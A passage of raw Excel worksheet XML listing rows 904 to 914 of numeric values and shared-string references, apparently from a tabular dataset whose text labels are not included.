      <c r="T904">
        <v>0</v>
      </c>
      <c r="U904">
        <v>300000</v>
      </c>
      <c r="V904">
        <v>0</v>
      </c>
      <c r="W904">
        <v>5000</v>
      </c>
      <c r="X904">
        <v>700</v>
      </c>
      <c r="Y904">
        <v>0</v>
      </c>
      <c r="Z904">
        <v>0</v>
      </c>
      <c r="AA904">
        <v>0</v>
      </c>
      <c r="AB904">
        <v>100</v>
      </c>
      <c r="AC904">
        <v>220</v>
      </c>
      <c r="AD904">
        <v>0</v>
      </c>
      <c r="AE904">
        <v>0</v>
      </c>
      <c r="AF904" t="s">
        <v>6965</v>
      </c>
      <c r="AG904">
        <v>96251</v>
      </c>
      <c r="AH904">
        <v>25</v>
      </c>
      <c r="AJ904">
        <v>441</v>
      </c>
      <c r="AK904" t="s">
        <v>6966</v>
      </c>
      <c r="AL904" t="s">
        <v>6967</v>
      </c>
      <c r="AM904" t="s">
        <v>6968</v>
      </c>
      <c r="AN904" t="s">
        <v>55</v>
      </c>
      <c r="AO904">
        <v>2020</v>
      </c>
      <c r="AP904">
        <v>8151835442</v>
      </c>
      <c r="AQ904" t="s">
        <v>6969</v>
      </c>
      <c r="AR904" t="s">
        <v>6965</v>
      </c>
      <c r="AU904">
        <v>26</v>
      </c>
      <c r="AV904">
        <v>1</v>
      </c>
      <c r="AW904">
        <v>0</v>
      </c>
      <c r="AX904">
        <v>0</v>
      </c>
      <c r="AY904">
        <v>32</v>
      </c>
      <c r="AZ904">
        <v>222</v>
      </c>
      <c r="BA904" t="s">
        <v>17316</v>
      </c>
      <c r="BB904" t="s">
        <v>15922</v>
      </c>
      <c r="BC904" t="s">
        <v>9536</v>
      </c>
      <c r="BD904" t="s">
        <v>10350</v>
      </c>
    </row>
    <row r="905" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A905">
        <v>2784</v>
      </c>
      <c r="B905" t="s">
        <v>6970</v>
      </c>
      <c r="C905" t="s">
        <v>99</v>
      </c>
      <c r="D905" t="s">
        <v>6971</v>
      </c>
      <c r="E905" t="s">
        <v>142</v>
      </c>
      <c r="F905" t="s">
        <v>1487</v>
      </c>
      <c r="G905" s="1">
        <v>44046</v>
      </c>
      <c r="H905">
        <v>3292</v>
      </c>
      <c r="I905">
        <v>3292</v>
      </c>
      <c r="J905">
        <v>11</v>
      </c>
      <c r="K905">
        <v>0</v>
      </c>
      <c r="L905">
        <v>0</v>
      </c>
      <c r="M905">
        <v>0</v>
      </c>
      <c r="N905">
        <v>0</v>
      </c>
      <c r="O905">
        <v>0</v>
      </c>
      <c r="P905">
        <v>0</v>
      </c>
      <c r="Q905">
        <v>0</v>
      </c>
      <c r="R905">
        <v>0</v>
      </c>
      <c r="S905">
        <v>0</v>
      </c>
      <c r="T905">
        <v>0</v>
      </c>
      <c r="U905">
        <v>2000000</v>
      </c>
      <c r="V905">
        <v>0</v>
      </c>
      <c r="W905">
        <v>0</v>
      </c>
      <c r="X905">
        <v>0</v>
      </c>
      <c r="Y905">
        <v>0</v>
      </c>
      <c r="Z905">
        <v>0</v>
      </c>
      <c r="AA905">
        <v>0</v>
      </c>
      <c r="AB905">
        <v>0</v>
      </c>
      <c r="AC905">
        <v>0</v>
      </c>
      <c r="AD905">
        <v>0</v>
      </c>
      <c r="AE905">
        <v>0</v>
      </c>
      <c r="AF905" t="s">
        <v>6972</v>
      </c>
      <c r="AG905">
        <v>14440</v>
      </c>
      <c r="AH905">
        <v>12</v>
      </c>
      <c r="AJ905">
        <v>160</v>
      </c>
      <c r="AK905" t="s">
        <v>114</v>
      </c>
      <c r="AL905" t="s">
        <v>114</v>
      </c>
      <c r="AM905" t="s">
        <v>6973</v>
      </c>
      <c r="AN905" t="s">
        <v>55</v>
      </c>
      <c r="AO905">
        <v>2010</v>
      </c>
      <c r="AP905" t="s">
        <v>6974</v>
      </c>
      <c r="AQ905" t="s">
        <v>6975</v>
      </c>
      <c r="AR905" t="s">
        <v>6976</v>
      </c>
      <c r="AS905" t="s">
        <v>187</v>
      </c>
      <c r="AT905" t="s">
        <v>58</v>
      </c>
      <c r="AU905">
        <v>24</v>
      </c>
      <c r="AV905">
        <v>1</v>
      </c>
      <c r="AW905">
        <v>22</v>
      </c>
      <c r="AX905">
        <v>0</v>
      </c>
      <c r="AY905">
        <v>34</v>
      </c>
      <c r="AZ905">
        <v>12</v>
      </c>
      <c r="BA905" t="s">
        <v>17041</v>
      </c>
      <c r="BB905" t="s">
        <v>14857</v>
      </c>
      <c r="BC905" t="s">
        <v>9952</v>
      </c>
      <c r="BD905" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="906" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A906">
        <v>2781</v>
      </c>
      <c r="B906" t="s">
        <v>6977</v>
      </c>
      <c r="C906" t="s">
        <v>157</v>
      </c>
      <c r="D906" t="s">
        <v>6978</v>
      </c>
      <c r="E906" t="s">
        <v>142</v>
      </c>
      <c r="F906" t="s">
        <v>609</v>
      </c>
      <c r="G906" s="1">
        <v>43986</v>
      </c>
      <c r="H906">
        <v>3325</v>
      </c>
      <c r="I906">
        <v>3325</v>
      </c>
      <c r="J906">
        <v>2</v>
      </c>
      <c r="K906">
        <v>0</v>
      </c>
      <c r="L906">
        <v>3</v>
      </c>
      <c r="M906">
        <v>0</v>
      </c>
      <c r="N906">
        <v>0</v>
      </c>
      <c r="O906">
        <v>0</v>
      </c>
      <c r="P906">
        <v>0</v>
      </c>
      <c r="Q906">
        <v>0</v>
      </c>
      <c r="R906">
        <v>0</v>
      </c>
      <c r="S906">
        <v>0</v>
      </c>
      <c r="T906">
        <v>0</v>
      </c>
      <c r="U906">
        <v>200000</v>
      </c>
      <c r="V906">
        <v>0</v>
      </c>
      <c r="W906">
        <v>10000</v>
      </c>
      <c r="X906">
        <v>0</v>
      </c>
      <c r="Y906">
        <v>0</v>
      </c>
      <c r="Z906">
        <v>0</v>
      </c>
      <c r="AA906">
        <v>0</v>
      </c>
      <c r="AB906">
        <v>0</v>
      </c>
      <c r="AC906">
        <v>0</v>
      </c>
      <c r="AD906">
        <v>0</v>
      </c>
      <c r="AE906">
        <v>0</v>
      </c>
      <c r="AF906" t="s">
        <v>6979</v>
      </c>
      <c r="AG906">
        <v>61234</v>
      </c>
      <c r="AH906">
        <v>16</v>
      </c>
      <c r="AJ906">
        <v>242</v>
      </c>
      <c r="AK906" t="s">
        <v>1894</v>
      </c>
      <c r="AL906" t="s">
        <v>4337</v>
      </c>
      <c r="AM906" t="s">
        <v>6980</v>
      </c>
      <c r="AN906" t="s">
        <v>55</v>
      </c>
      <c r="AO906">
        <v>2007</v>
      </c>
      <c r="AP906" t="s">
        <v>6981</v>
      </c>
      <c r="AQ906" t="s">
        <v>6982</v>
      </c>
      <c r="AR906" t="s">
        <v>6979</v>
      </c>
      <c r="AS906" t="s">
        <v>71</v>
      </c>
      <c r="AT906" t="s">
        <v>58</v>
      </c>
      <c r="AU906">
        <v>26</v>
      </c>
      <c r="AV906">
        <v>1</v>
      </c>
      <c r="AW906">
        <v>20</v>
      </c>
      <c r="AX906">
        <v>5</v>
      </c>
      <c r="AY906">
        <v>2</v>
      </c>
      <c r="AZ906">
        <v>3</v>
      </c>
      <c r="BA906" t="s">
        <v>17328</v>
      </c>
      <c r="BB906" t="e">
        <v>#N/A</v>
      </c>
      <c r="BC906" t="s">
        <v>10892</v>
      </c>
      <c r="BD906" t="s">
        <v>10893</v>
      </c>
    </row>
    <row r="907" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A907">
        <v>2732</v>
      </c>
      <c r="B907" t="s">
        <v>6983</v>
      </c>
      <c r="C907" t="s">
        <v>2848</v>
      </c>
      <c r="D907" t="s">
        <v>6984</v>
      </c>
      <c r="E907" t="s">
        <v>142</v>
      </c>
      <c r="F907" t="s">
        <v>6985</v>
      </c>
      <c r="G907" s="1">
        <v>44013</v>
      </c>
      <c r="H907">
        <v>3470</v>
      </c>
      <c r="I907">
        <v>3470</v>
      </c>
      <c r="J907">
        <v>6</v>
      </c>
      <c r="K907">
        <v>0</v>
      </c>
      <c r="L907">
        <v>3</v>
      </c>
      <c r="M907">
        <v>1</v>
      </c>
      <c r="N907">
        <v>0</v>
      </c>
      <c r="O907">
        <v>0</v>
      </c>
      <c r="P907">
        <v>0</v>
      </c>
      <c r="Q907">
        <v>3</v>
      </c>
      <c r="R907">
        <v>20</v>
      </c>
      <c r="S907">
        <v>0</v>
      </c>
      <c r="T907">
        <v>1</v>
      </c>
      <c r="U907">
        <v>180000</v>
      </c>
      <c r="V907">
        <v>0</v>
      </c>
      <c r="W907">
        <v>3000</v>
      </c>
      <c r="X907">
        <v>2000</v>
      </c>
      <c r="Y907">
        <v>0</v>
      </c>
      <c r="Z907">
        <v>0</v>
      </c>
      <c r="AA907">
        <v>0</v>
      </c>
      <c r="AB907">
        <v>150</v>
      </c>
      <c r="AC907">
        <v>7000</v>
      </c>
      <c r="AD907">
        <v>0</v>
      </c>
      <c r="AE907">
        <v>200000</v>
      </c>
      <c r="AF907" t="s">
        <v>6986</v>
      </c>
      <c r="AG907">
        <v>30862</v>
      </c>
      <c r="AH907">
        <v>9</v>
      </c>
      <c r="AJ907">
        <v>108</v>
      </c>
      <c r="AK907" t="s">
        <v>6987</v>
      </c>
      <c r="AL907" t="s">
        <v>6988</v>
      </c>
      <c r="AM907" t="s">
        <v>6989</v>
      </c>
      <c r="AN907" t="s">
        <v>55</v>
      </c>
      <c r="AO907">
        <v>1988</v>
      </c>
      <c r="AP907">
        <v>81532321988</v>
      </c>
      <c r="AQ907" t="s">
        <v>6990</v>
      </c>
      <c r="AR907" t="s">
        <v>6991</v>
      </c>
      <c r="AS907" t="s">
        <v>71</v>
      </c>
      <c r="AT907" t="s">
        <v>58</v>
      </c>
      <c r="AU907">
        <v>7</v>
      </c>
      <c r="AV907">
        <v>2</v>
      </c>
      <c r="AW907">
        <v>0</v>
      </c>
      <c r="AX907">
        <v>140</v>
      </c>
      <c r="AY907">
        <v>30</v>
      </c>
      <c r="AZ907">
        <v>10</v>
      </c>
      <c r="BA907" t="s">
        <v>17297</v>
      </c>
      <c r="BB907" t="s">
        <v>15927</v>
      </c>
      <c r="BC907">
        <v>0</v>
      </c>
      <c r="BD907" t="s">
        <v>9973</v>
      </c>
    </row>
    <row r="908" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A908">
        <v>2792</v>
      </c>
      <c r="B908" t="s">
        <v>6992</v>
      </c>
      <c r="C908" t="s">
        <v>726</v>
      </c>
      <c r="D908" t="s">
        <v>6993</v>
      </c>
      <c r="E908" t="s">
        <v>111</v>
      </c>
      <c r="F908" t="s">
        <v>6994</v>
      </c>
      <c r="G908" s="1">
        <v>43950</v>
      </c>
      <c r="H908">
        <v>3494</v>
      </c>
      <c r="I908">
        <v>3494</v>
      </c>
      <c r="J908">
        <v>0</v>
      </c>
      <c r="K908">
        <v>2</v>
      </c>
      <c r="L908">
        <v>3</v>
      </c>
      <c r="M908">
        <v>0</v>
      </c>
      <c r="N908">
        <v>0</v>
      </c>
      <c r="O908">
        <v>0</v>
      </c>
      <c r="P908">
        <v>0</v>
      </c>
      <c r="Q908">
        <v>4</v>
      </c>
      <c r="R908">
        <v>8</v>
      </c>
      <c r="S908">
        <v>0</v>
      </c>
      <c r="T908">
        <v>1</v>
      </c>
      <c r="U908">
        <v>0</v>
      </c>
      <c r="V908">
        <v>50000</v>
      </c>
      <c r="W908">
        <v>3000</v>
      </c>
      <c r="X908">
        <v>0</v>
      </c>
      <c r="Y908">
        <v>0</v>
      </c>
      <c r="Z908">
        <v>0</v>
      </c>
      <c r="AA908">
        <v>0</v>
      </c>
      <c r="AB908">
        <v>8</v>
      </c>
      <c r="AC908">
        <v>500</v>
      </c>
      <c r="AD908">
        <v>0</v>
      </c>
      <c r="AE908">
        <v>10000</v>
      </c>
      <c r="AF908" t="s">
        <v>6995</v>
      </c>
      <c r="AG908">
        <v>97716</v>
      </c>
      <c r="AH908">
        <v>32</v>
      </c>
      <c r="AJ908">
        <v>471</v>
      </c>
      <c r="AK908" t="s">
        <v>6894</v>
      </c>
      <c r="AL908" t="s">
        <v>6996</v>
      </c>
      <c r="AM908" t="s">
        <v>6997</v>
      </c>
      <c r="AN908" t="s">
        <v>55</v>
      </c>
      <c r="AO908">
        <v>2018</v>
      </c>
      <c r="AP908">
        <v>82347393662</v>
      </c>
      <c r="AQ908" t="s">
        <v>6998</v>
      </c>
      <c r="AR908" t="s">
        <v>6999</v>
      </c>
      <c r="AS908" t="s">
        <v>71</v>
      </c>
      <c r="AT908" t="s">
        <v>58</v>
      </c>
      <c r="AU908">
        <v>25</v>
      </c>
      <c r="AV908">
        <v>0</v>
      </c>
      <c r="AW908">
        <v>3</v>
      </c>
      <c r="AX908">
        <v>1</v>
      </c>
      <c r="AY908">
        <v>63</v>
      </c>
      <c r="AZ908">
        <v>25</v>
      </c>
      <c r="BA908" t="s">
        <v>17331</v>
      </c>
      <c r="BB908" t="s">
        <v>15926</v>
      </c>
      <c r="BC908" t="s">
        <v>10988</v>
      </c>
      <c r="BD908" t="s">
        <v>10989</v>
      </c>
    </row>
    <row r="909" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A909">
        <v>2776</v>
      </c>
      <c r="B909" t="s">
        <v>7000</v>
      </c>
      <c r="C909" t="s">
        <v>477</v>
      </c>
      <c r="D909" t="s">
        <v>7001</v>
      </c>
      <c r="E909" t="s">
        <v>142</v>
      </c>
      <c r="F909" t="s">
        <v>666</v>
      </c>
      <c r="G909" s="1">
        <v>44012</v>
      </c>
      <c r="H909">
        <v>3498</v>
      </c>
      <c r="I909">
        <v>3498</v>
      </c>
      <c r="J909">
        <v>1</v>
      </c>
      <c r="K909">
        <v>0</v>
      </c>
      <c r="L909">
        <v>5</v>
      </c>
      <c r="M909">
        <v>0</v>
      </c>
      <c r="N909">
        <v>0</v>
      </c>
      <c r="O909">
        <v>0</v>
      </c>
      <c r="P909">
        <v>0</v>
      </c>
      <c r="Q909">
        <v>0</v>
      </c>
      <c r="R909">
        <v>8</v>
      </c>
      <c r="S909">
        <v>0</v>
      </c>
      <c r="T909">
        <v>1</v>
      </c>
      <c r="U909">
        <v>100000</v>
      </c>
      <c r="V909">
        <v>0</v>
      </c>
      <c r="W909">
        <v>15000</v>
      </c>
      <c r="X909">
        <v>0</v>
      </c>
      <c r="Y909">
        <v>0</v>
      </c>
      <c r="Z909">
        <v>0</v>
      </c>
      <c r="AA909">
        <v>0</v>
      </c>
      <c r="AB909">
        <v>0</v>
      </c>
      <c r="AC909">
        <v>8000</v>
      </c>
      <c r="AD909">
        <v>0</v>
      </c>
      <c r="AE909">
        <v>5000</v>
      </c>
      <c r="AF909" t="s">
        <v>7002</v>
      </c>
      <c r="AG909">
        <v>95546</v>
      </c>
      <c r="AH909">
        <v>29</v>
      </c>
      <c r="AJ909">
        <v>383</v>
      </c>
      <c r="AK909" t="s">
        <v>1339</v>
      </c>
      <c r="AL909" t="s">
        <v>6850</v>
      </c>
      <c r="AM909" t="s">
        <v>7003</v>
      </c>
      <c r="AN909" t="s">
        <v>68</v>
      </c>
      <c r="AO909">
        <v>2019</v>
      </c>
      <c r="AP909">
        <v>81245026787</v>
      </c>
      <c r="AQ909" t="s">
        <v>7002</v>
      </c>
      <c r="AR909" t="s">
        <v>7002</v>
      </c>
      <c r="AS909" t="s">
        <v>371</v>
      </c>
      <c r="AT909" t="s">
        <v>72</v>
      </c>
      <c r="AU909">
        <v>25</v>
      </c>
      <c r="AV909">
        <v>1</v>
      </c>
      <c r="AW909">
        <v>14</v>
      </c>
      <c r="AX909">
        <v>10</v>
      </c>
      <c r="AY909">
        <v>6</v>
      </c>
      <c r="AZ909">
        <v>5</v>
      </c>
      <c r="BA909" t="s">
        <v>17317</v>
      </c>
      <c r="BB909">
        <v>0</v>
      </c>
      <c r="BC909" t="s">
        <v>9693</v>
      </c>
      <c r="BD909">
        <v>0</v>
      </c>
    </row>
    <row r="910" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A910">
        <v>2802</v>
      </c>
      <c r="B910" t="s">
        <v>7004</v>
      </c>
      <c r="C910" t="s">
        <v>3717</v>
      </c>
      <c r="D910" t="s">
        <v>7005</v>
      </c>
      <c r="E910" t="s">
        <v>49</v>
      </c>
      <c r="F910" t="s">
        <v>7006</v>
      </c>
      <c r="G910" s="1">
        <v>44116</v>
      </c>
      <c r="H910">
        <v>3554</v>
      </c>
      <c r="I910">
        <v>3554</v>
      </c>
      <c r="J910">
        <v>0</v>
      </c>
      <c r="K910">
        <v>0</v>
      </c>
      <c r="L910">
        <v>0</v>
      </c>
      <c r="M910">
        <v>0</v>
      </c>
      <c r="N910">
        <v>0</v>
      </c>
      <c r="O910">
        <v>0</v>
      </c>
      <c r="P910">
        <v>0</v>
      </c>
      <c r="Q910">
        <v>3</v>
      </c>
      <c r="R910">
        <v>2</v>
      </c>
      <c r="S910">
        <v>0</v>
      </c>
      <c r="T910">
        <v>0</v>
      </c>
      <c r="U910">
        <v>0</v>
      </c>
      <c r="V910">
        <v>0</v>
      </c>
      <c r="W910">
        <v>0</v>
      </c>
      <c r="X910">
        <v>0</v>
      </c>
      <c r="Y910">
        <v>0</v>
      </c>
      <c r="Z910">
        <v>0</v>
      </c>
      <c r="AA910">
        <v>0</v>
      </c>
      <c r="AB910">
        <v>5</v>
      </c>
      <c r="AC910">
        <v>5</v>
      </c>
      <c r="AD910">
        <v>0</v>
      </c>
      <c r="AE910">
        <v>0</v>
      </c>
      <c r="AF910" t="s">
        <v>7007</v>
      </c>
      <c r="AG910">
        <v>38225</v>
      </c>
      <c r="AH910">
        <v>8</v>
      </c>
      <c r="AJ910">
        <v>125</v>
      </c>
      <c r="AK910" t="s">
        <v>7008</v>
      </c>
      <c r="AL910" t="s">
        <v>7009</v>
      </c>
      <c r="AM910" t="s">
        <v>7010</v>
      </c>
      <c r="AN910" t="s">
        <v>68</v>
      </c>
      <c r="AO910">
        <v>2015</v>
      </c>
      <c r="AP910">
        <v>8136737984</v>
      </c>
      <c r="AQ910" t="s">
        <v>7011</v>
      </c>
      <c r="AR910" t="s">
        <v>7007</v>
      </c>
      <c r="AS910" t="s">
        <v>71</v>
      </c>
      <c r="AT910" t="s">
        <v>72</v>
      </c>
      <c r="AU910">
        <v>6</v>
      </c>
      <c r="AV910">
        <v>0</v>
      </c>
      <c r="AW910">
        <v>0</v>
      </c>
      <c r="AX910">
        <v>0</v>
      </c>
      <c r="AY910">
        <v>0</v>
      </c>
      <c r="AZ910">
        <v>2</v>
      </c>
      <c r="BA910" t="s">
        <v>17340</v>
      </c>
      <c r="BB910">
        <v>0</v>
      </c>
      <c r="BC910" t="s">
        <v>10966</v>
      </c>
      <c r="BD910" t="s">
        <v>9949</v>
      </c>
    </row>
    <row r="911" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A911">
        <v>2798</v>
      </c>
      <c r="B911" t="s">
        <v>7012</v>
      </c>
      <c r="C911" t="s">
        <v>47</v>
      </c>
      <c r="D911" t="s">
        <v>7013</v>
      </c>
      <c r="E911" t="s">
        <v>944</v>
      </c>
      <c r="F911" t="s">
        <v>2407</v>
      </c>
      <c r="G911" s="1">
        <v>43987</v>
      </c>
      <c r="H911">
        <v>3576</v>
      </c>
      <c r="I911">
        <v>3576</v>
      </c>
      <c r="J911">
        <v>0</v>
      </c>
      <c r="K911">
        <v>2</v>
      </c>
      <c r="L911">
        <v>0</v>
      </c>
      <c r="M911">
        <v>0</v>
      </c>
      <c r="N911">
        <v>0</v>
      </c>
      <c r="O911">
        <v>0</v>
      </c>
      <c r="P911">
        <v>3</v>
      </c>
      <c r="Q911">
        <v>0</v>
      </c>
      <c r="R911">
        <v>0</v>
      </c>
      <c r="S911">
        <v>0</v>
      </c>
      <c r="T911">
        <v>0</v>
      </c>
      <c r="U911">
        <v>0</v>
      </c>
      <c r="V911">
        <v>15000</v>
      </c>
      <c r="W911">
        <v>0</v>
      </c>
      <c r="X911">
        <v>0</v>
      </c>
      <c r="Y911">
        <v>0</v>
      </c>
      <c r="Z911">
        <v>0</v>
      </c>
      <c r="AA911">
        <v>100</v>
      </c>
      <c r="AB911">
        <v>0</v>
      </c>
      <c r="AC911">
        <v>0</v>
      </c>
      <c r="AD911">
        <v>0</v>
      </c>
      <c r="AE911">
        <v>0</v>
      </c>
      <c r="AF911" t="s">
        <v>5216</v>
      </c>
      <c r="AG911">
        <v>20371</v>
      </c>
      <c r="AH911">
        <v>2</v>
      </c>
      <c r="AJ911">
        <v>35</v>
      </c>
      <c r="AK911" t="s">
        <v>471</v>
      </c>
      <c r="AL911" t="s">
        <v>472</v>
      </c>
      <c r="AM911" t="s">
        <v>7014</v>
      </c>
      <c r="AN911" t="s">
        <v>55</v>
      </c>
      <c r="AO911">
        <v>2015</v>
      </c>
      <c r="AP911" t="s">
        <v>7015</v>
      </c>
      <c r="AQ911" t="s">
        <v>7016</v>
      </c>
      <c r="AR911" t="s">
        <v>7017</v>
      </c>
      <c r="AS911" t="s">
        <v>71</v>
      </c>
      <c r="AT911" t="s">
        <v>58</v>
      </c>
      <c r="AU911">
        <v>26</v>
      </c>
      <c r="AV911">
        <v>1</v>
      </c>
      <c r="AW911">
        <v>30</v>
      </c>
      <c r="AX911">
        <v>105</v>
      </c>
      <c r="AY911">
        <v>20</v>
      </c>
      <c r="AZ911">
        <v>15</v>
      </c>
      <c r="BA911" t="s">
        <v>17337</v>
      </c>
      <c r="BB911" t="s">
        <v>15928</v>
      </c>
      <c r="BC911">
        <v>0</v>
      </c>
      <c r="BD911" t="s">
        <v>9538</v>
      </c>
    </row>
    <row r="912" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A912">
        <v>2785</v>
      </c>
      <c r="B912" t="s">
        <v>7018</v>
      </c>
      <c r="C912" t="s">
        <v>579</v>
      </c>
      <c r="D912" t="s">
        <v>7019</v>
      </c>
      <c r="E912" t="s">
        <v>76</v>
      </c>
      <c r="F912" t="s">
        <v>7020</v>
      </c>
      <c r="G912" s="1">
        <v>43994</v>
      </c>
      <c r="H912">
        <v>3814</v>
      </c>
      <c r="I912">
        <v>3814</v>
      </c>
      <c r="J912">
        <v>0</v>
      </c>
      <c r="K912">
        <v>0</v>
      </c>
      <c r="L912">
        <v>0</v>
      </c>
      <c r="M912">
        <v>0</v>
      </c>
      <c r="N912">
        <v>0</v>
      </c>
      <c r="O912">
        <v>0</v>
      </c>
      <c r="P912">
        <v>0</v>
      </c>
      <c r="Q912">
        <v>1</v>
      </c>
      <c r="R912">
        <v>0</v>
      </c>
      <c r="S912">
        <v>0</v>
      </c>
      <c r="T912">
        <v>1</v>
      </c>
      <c r="U912">
        <v>0</v>
      </c>
      <c r="V912">
        <v>0</v>
      </c>
      <c r="W912">
        <v>0</v>
      </c>
      <c r="X912">
        <v>0</v>
      </c>
      <c r="Y912">
        <v>0</v>
      </c>
      <c r="Z912">
        <v>0</v>
      </c>
      <c r="AA912">
        <v>0</v>
      </c>
      <c r="AB912">
        <v>20</v>
      </c>
      <c r="AC912">
        <v>0</v>
      </c>
      <c r="AD912">
        <v>0</v>
      </c>
      <c r="AE912">
        <v>50</v>
      </c>
      <c r="AF912" t="s">
        <v>7021</v>
      </c>
      <c r="AG912">
        <v>75131</v>
      </c>
      <c r="AH912">
        <v>23</v>
      </c>
      <c r="AJ912">
        <v>364</v>
      </c>
      <c r="AK912" t="s">
        <v>5349</v>
      </c>
      <c r="AL912" t="s">
        <v>5350</v>
      </c>
      <c r="AM912" t="s">
        <v>7022</v>
      </c>
      <c r="AN912" t="s">
        <v>68</v>
      </c>
      <c r="AO912">
        <v>2004</v>
      </c>
      <c r="AP912">
        <v>81253024923</v>
      </c>
      <c r="AQ912" t="s">
        <v>7023</v>
      </c>
      <c r="AR912" t="s">
        <v>7021</v>
      </c>
      <c r="AS912" t="s">
        <v>71</v>
      </c>
      <c r="AT912" t="s">
        <v>72</v>
      </c>
      <c r="AU912">
        <v>0</v>
      </c>
      <c r="AV912">
        <v>0</v>
      </c>
      <c r="AW912">
        <v>0</v>
      </c>
      <c r="AX912">
        <v>0</v>
      </c>
      <c r="AY912">
        <v>1</v>
      </c>
      <c r="AZ912">
        <v>3</v>
      </c>
      <c r="BA912" t="s">
        <v>17367</v>
      </c>
      <c r="BB912" t="s">
        <v>14648</v>
      </c>
      <c r="BC912" t="s">
        <v>10241</v>
      </c>
      <c r="BD912">
        <v>0</v>
      </c>
    </row>
    <row r="913" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A913">
        <v>2755</v>
      </c>
      <c r="B913" t="s">
        <v>1838</v>
      </c>
      <c r="C913" t="s">
        <v>99</v>
      </c>
      <c r="D913" t="s">
        <v>7024</v>
      </c>
      <c r="E913" t="s">
        <v>142</v>
      </c>
      <c r="F913" t="s">
        <v>537</v>
      </c>
      <c r="G913" s="1">
        <v>44081</v>
      </c>
      <c r="H913">
        <v>3843</v>
      </c>
      <c r="I913">
        <v>3843</v>
      </c>
      <c r="J913">
        <v>4</v>
      </c>
      <c r="K913">
        <v>0</v>
      </c>
      <c r="L913">
        <v>0</v>
      </c>
      <c r="M913">
        <v>2</v>
      </c>
      <c r="N913">
        <v>20000</v>
      </c>
      <c r="O913">
        <v>0</v>
      </c>
      <c r="P913">
        <v>0</v>
      </c>
      <c r="Q913">
        <v>4</v>
      </c>
      <c r="R913">
        <v>8</v>
      </c>
      <c r="S913">
        <v>0</v>
      </c>
      <c r="T913">
        <v>0</v>
      </c>
      <c r="U913">
        <v>130000</v>
      </c>
      <c r="V913">
        <v>0</v>
      </c>
      <c r="W913">
        <v>0</v>
      </c>
      <c r="X913">
        <v>10368</v>
      </c>
      <c r="Y913">
        <v>0</v>
      </c>
      <c r="Z913">
        <v>0</v>
      </c>
      <c r="AA913">
        <v>0</v>
      </c>
      <c r="AB913">
        <v>1000</v>
      </c>
      <c r="AC913">
        <v>1000</v>
      </c>
      <c r="AD913">
        <v>0</v>
      </c>
      <c r="AE913">
        <v>0</v>
      </c>
      <c r="AF913" t="s">
        <v>7025</v>
      </c>
      <c r="AG913">
        <v>14430</v>
      </c>
      <c r="AH913">
        <v>12</v>
      </c>
      <c r="AJ913">
        <v>160</v>
      </c>
      <c r="AK913" t="s">
        <v>987</v>
      </c>
      <c r="AL913" t="s">
        <v>7026</v>
      </c>
      <c r="AM913" t="s">
        <v>7027</v>
      </c>
      <c r="AN913" t="s">
        <v>82</v>
      </c>
      <c r="AO913">
        <v>1970</v>
      </c>
      <c r="AP913" t="s">
        <v>7028</v>
      </c>
      <c r="AQ913" t="s">
        <v>7029</v>
      </c>
      <c r="AR913" t="s">
        <v>7030</v>
      </c>
      <c r="AS913" t="s">
        <v>71</v>
      </c>
      <c r="AT913" t="s">
        <v>86</v>
      </c>
      <c r="AU913">
        <v>32</v>
      </c>
      <c r="AV913">
        <v>1</v>
      </c>
      <c r="AW913">
        <v>82</v>
      </c>
      <c r="AX913">
        <v>343</v>
      </c>
      <c r="AY913">
        <v>32</v>
      </c>
      <c r="AZ913">
        <v>154</v>
      </c>
      <c r="BA913" t="s">
        <v>16584</v>
      </c>
      <c r="BB913" t="s">
        <v>14562</v>
      </c>
      <c r="BC913" t="s">
        <v>10442</v>
      </c>
      <c r="BD913" t="s">
        <v>9679</v>
      </c>
    </row>
    <row r="914" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A914">
        <v>2817</v>
      </c>
      <c r="B914" t="s">
        <v>7031</v>
      </c>
      <c r="C914" t="s">
        <v>157</v>
      </c>
      <c r="D914" t="s">
        <v>7032</v>
      </c>
      <c r="E914" t="s">
        <v>142</v>
      </c>
      <c r="F914" t="s">
        <v>7033</v>
      </c>
      <c r="G914" s="1">
        <v>44176</v>
      </c>
      <c r="H914">
        <v>3941</v>
      </c>
      <c r="I914">
        <v>3941</v>
      </c>
      <c r="J914">
        <v>2</v>
      </c>
      <c r="K914">
        <v>0</v>
      </c>
      <c r="L914">
        <v>2</v>
      </c>
      <c r="M914">
        <v>1</v>
      </c>
      <c r="N914">
        <v>0</v>
      </c>
      <c r="O914">
        <v>0</v>
      </c>
      <c r="P914">
        <v>0</v>
      </c>
      <c r="Q914">
        <v>0</v>
      </c>
      <c r="R914">
        <v>0</v>
      </c>
      <c r="S914">
        <v>0</v>
      </c>
      <c r="T914">
        <v>0</v>
      </c>
      <c r="U914">
        <v>120000</v>
      </c>
      <c r="V914">
        <v>0</v>
      </c>
      <c r="W914">
        <v>6000</v>
      </c>
      <c r="X914">
        <v>400</v>
      </c>
      <c r="Y914">
        <v>0</v>
      </c>
      <c r="Z914">
        <v>0</v>
      </c>
      <c r="AA914">
        <v>0</v>
      </c>
      <c r="AB914">
        <v>0</v>
      </c>
      <c r="AC914">
        <v>0</v>
      </c>
      <c r="AD914">
        <v>0</v>
      </c>
      <c r="AE914">
        <v>0</v>
      </c>
      <c r="AF914" t="s">
        <v>7034</v>
      </c>
      <c r="AG914">
        <v>67152</v>
      </c>
      <c r="AH914">
        <v>16</v>
      </c>
      <c r="AJ914">
        <v>241</v>
      </c>
      <c r="AK914" t="s">
        <v>1117</v>
      </c>
      <c r="AL914" t="s">
        <v>1118</v>
      </c>
      <c r="AM914" t="s">
        <v>7035</v>
      </c>
      <c r="AN914" t="s">
        <v>55</v>
      </c>
      <c r="AO914">
        <v>2018</v>
      </c>
      <c r="AP914" t="s">
        <v>7036</v>
      </c>
      <c r="AQ914" t="s">
        <v>7037</v>
      </c>
      <c r="AR914" t="s">
        <v>7034</v>
      </c>
      <c r="AU914">
        <v>26</v>
      </c>
      <c r="AV914">
        <v>1</v>
      </c>
      <c r="AW914">
        <v>35</v>
      </c>
      <c r="AX914">
        <v>17</v>
      </c>
      <c r="AY914">
